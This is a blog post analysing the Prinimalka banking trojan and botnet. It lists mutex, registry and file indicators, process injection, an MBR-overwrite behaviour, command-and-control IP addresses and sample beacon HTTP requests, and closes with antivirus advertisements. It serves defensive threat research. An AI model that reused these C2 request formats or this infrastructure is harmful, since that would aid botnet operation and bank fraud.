Advanced analysis: Uncovering the Trojan Prinimalka Botnet Malware

A Gozi-looking variant, Trojan Prinimalka, is identified in the Project Blitzkrieg related issues for this Fall. It’s unclear if the botherders are part of Project Blitzkrieg, however, it most certainly looks like them. This botnet issue is described as a “war on banks” and that “banks are not ready”.

What’s more is that with the attacks on banks, like on HSBC a few weeks ago, to JPMorganChase banking over a month ago – it seems unclear if the botnet was used to construct these attacks. Security researchers of top research firms are unsure of the conditions of the attacks, and have made many attempts to get some data to help investigate all of this.

Here will be described some of the details of the malware used in this botnet, Trj.Prin as seCURE Connexion labels it, or its main names Gozi-Prinimalka or just Trojan.Prinimalka.

Confused yet? Trojan.Prinimalka is a banking trojan used for a botnet, which is then used as a means to DDoS a banking website/server.

Two distinct variants used: “gov” and “nah”

Generalities of both variants

  • Mutex: sdfsdfsdfsdfsfsdfsdfsdfsdfsdf
  • Configuration values for the botnet are automatically added by the dropper to the Registry under “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion”
  • A random port is added to localhost (127.0.0.1), which allows the type 2 proxy SCKS command to function, and binds itself to cmd.exe on localhost for the TELN command.
  • Makes anonymous requests to banking websites via the zombie computer (the victim’s computer).
  • It attempts to inject itself inside of normal Windows System Processes, such as services.exe, svchost.exe, SYSTEM, smss.exe, winlogon.exe, lsass.exe, csrss.exe, etc.
  • There are different bank URLs targeted also, that can be used in a bait-and-switch operation. Mainly acting like a HOSTS file, where it can change the URL and redirect the banking site, so login information or other personal information can be obtained.
  • Quick whois queries on the IP addresses identifies “Ruslan Storozhenko” (Yes?) at hosting company “Tehnologii Budushego LLC”. Which this comes at no surprise, since the ngrBot was hosted at Tehnologii Budushego LLC. Not saying the hosting company is bad, however, the company should be on big watchout for fraudulent activity.
  • The IP address 213.155.28.104 is related to multiple password stealing and banking trojans. Project Honeypot calls the IP address part of a dictionary attacker and content spammer.

gov

  • Below is the general configuration and commands.
  • Type 1 command example on XP system: GET /system/prinimalka.py/command?user_id=33520xxxxx&version_id=022201&crc=00000000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: 213.***.**.104
  • Dropped files:
    • %UserProfile%\govXXXX.exe–the “X”s are random lowercase letters
    • %UserProfile%\govtemp1.exe
    • %UserProfile%\govold.exe
    • %UserProfile%\govcookies.txt
    • %CD%\govcookies.dat
  • To be able to proliferate the malware through the system, it has to first start with govtemp1.exe, which is the dropper/downloader. It then will attempt to update with govold.exe to make sure it has a new version. Sometimes it decides if a shutdown is needed, especially if the computer cannot be used in the botnet (I.E. computer not powerful enough, too much lag, etc.), it will overwrite the first four bytes of “\\.\PHYSICALDRIVE0” and then shutdown the computer.
  • It maintains its presence on the machine by monitoring/reinstalling as needed, with govXXXX.exe.
  • Primary command & call address (C&C): 93.115.241.114
  • Configuration can be changed to nah as described below.

nah

  • Other than having very similar features to the gov variant, except that the files are prefixed with “nah” instead of “gov”.
  • It does have a different configuration for its command (type 2 command, XP system): GET /system/prinimalka.py/options?user_id=33520xxxxx&version_id=022201&crc=34661b26&uptime=00:00:00:59&port=5641&ip= HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: 193.xxx.92.xxx

Overall, this banking trojan has quite some robust actions, but nothing real new. It appears like the Gozi trojan quite a bit, and may be a competitor to some other botnets like TDL or something.

 

To protect against botnets and other malware, don’t miss out on your chance for security software below (two specials):

 

Kaspersky ONE Universal Security – $25 off & get Laplink PCmover Home FREE!

$25 OFF Kaspersky ONE Universal Security

Get avast! Internet Security 7 for 25% off now!

Advertisements

Tags: , , , , , , , , , , , , ,

About Jay Pfoutz

Marketer
%d bloggers like this: